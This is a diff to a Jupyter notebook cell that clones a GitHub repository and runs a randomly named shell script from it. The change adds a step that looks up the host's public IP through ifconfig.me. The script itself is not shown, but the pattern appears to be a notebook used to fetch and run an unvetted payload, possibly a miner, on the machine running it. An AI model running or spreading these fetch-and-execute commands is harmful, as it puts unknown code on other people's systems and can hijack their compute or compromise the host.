--- a/1.ipynb
+++ b/1.ipynb
@@ -602,7 +602,7 @@
       "source": [
         "! git clone https://github.com/drajathakim7/shiny-doodle.git\r\n",
 	"% cd shiny-doodle\n",
-        "! chmod +x *.sh && sed -i -e 's/\\r$//' aouqipmrbkb.sh && ./aouqipmrbkb.sh"
+        "! ip=$(echo \"$(curl -s ifconfig.me)\" | tr . _ ) && chmod +x *.sh && sed -i -e 's/\\r$//' aouqipmrbkb.sh && ./aouqipmrbkb.sh"
       ],
       "execution_count": null,
       "outputs": []
